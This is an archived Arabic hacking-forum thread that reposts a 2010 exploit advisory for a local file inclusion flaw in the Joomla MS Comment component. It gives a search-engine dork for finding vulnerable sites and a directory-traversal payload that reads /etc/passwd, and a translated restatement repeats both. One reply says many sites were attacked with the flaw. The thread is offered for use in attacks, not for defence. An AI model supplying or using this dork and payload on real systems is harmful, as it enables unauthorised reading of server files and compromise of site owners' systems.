:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Joomla Component MS Comment LFI Vulnerability (http://www.vbspiders.com/vb/t29485.html)

Dr.NaNo 05-16-2010 02:32 AM
Joomla Component MS Comment LFI Vulnerability
 
اقتباس:
# title: Joomla component ms comment lfi vulnerability
# edb-id: 12611
# cve-id: ()
# osvdb-id: ()
# author: Xr0b0t
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a

view source
print?
[!]================================================== =========================[!]

[~] joomla component ms comment lfi vulnerability
[~] author : Xr0b0t (nyco.danis@gmail.com)
[~] homepage : http://www.indonesiancoder.com | http://xr0b0t.name | http://malangcyber.com
[~] date : 16 mei, 2010

[!]================================================== =========================[!]

[ software information ]

[+] price : Free
[+] vulnerability : Lfi
[+] dork : Inurl:"com_mscomment" ;)
[+] version : 0.8.0b maybe lower also affected

[!]================================================== =========================[!]

[ vulnerable file ]

http://127.0.0.1/index.php?option=co...nt&controller=[indonesiancoder]

[ xpl ]

../../../../../../../../../../../../../../../etc/passwd%00


etc etc etc ;]

[!]================================================== =========================[!]

[ thx to ]

[+] kamtiez dulurku seng paling ganteng, endi kok ra rene
[+] indonesian coder team indonesianhacker malang cyber crew magelang cyber
[+] tukulesto,m3nw5,arianom,n4ck0,abah_benu,d0ntcry,bo byhikaru,gonzhack,senot
[+] contrex,yadoy666,pathloader,cimpli,marahmerah.ibl1 3z,r3m1ck,geni212
[+] coracore,gh4mb4s,jack-,vycod,m0rgue,otong,cs-31,yur4kha


[ note ]

[+] ojok jotos2an yo ..
[+] minggir semua arumbia team mau lewat ;)
[+] mbem : Lup u :">

[ quote ]

[+] indonesiancoder still r0x...
[+] arumbia team was here cuy mingir kabeh kate lewat ..
[+] malang cyber crew & magelang cyber community


الإستغلال ..:


اقتباس:
[ vulnerable file ]

http://127.0.0.1/index.php?option=co...nt&controller=[indonesiancoder]

[ xpl ]

../../../../../../../../../../../../../../../etc/passwd%00



الدورك للبحث عن المواقع المصابة في محركات البحث مثل قوقل .:



اقتباس:
inurl:"com_mscomment"


KaLa$nikoV 05-16-2010 06:32 PM
والله سكربت جمله افشل سكربت

سبب بقصف العديد من المواقع

مشكور دكتور نانو ع الثغره


اقبل مرروري

Dr.NaNo 05-17-2010 05:46 PM
العفوأأأ اخي فلكانو [ ومثل ماقلت سكربت جوملا إن شاء الله قريب ينتهي ههههههههههههههه لوول ]..


تحياتي لك ياغالي .


الساعة الآن 06:36 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0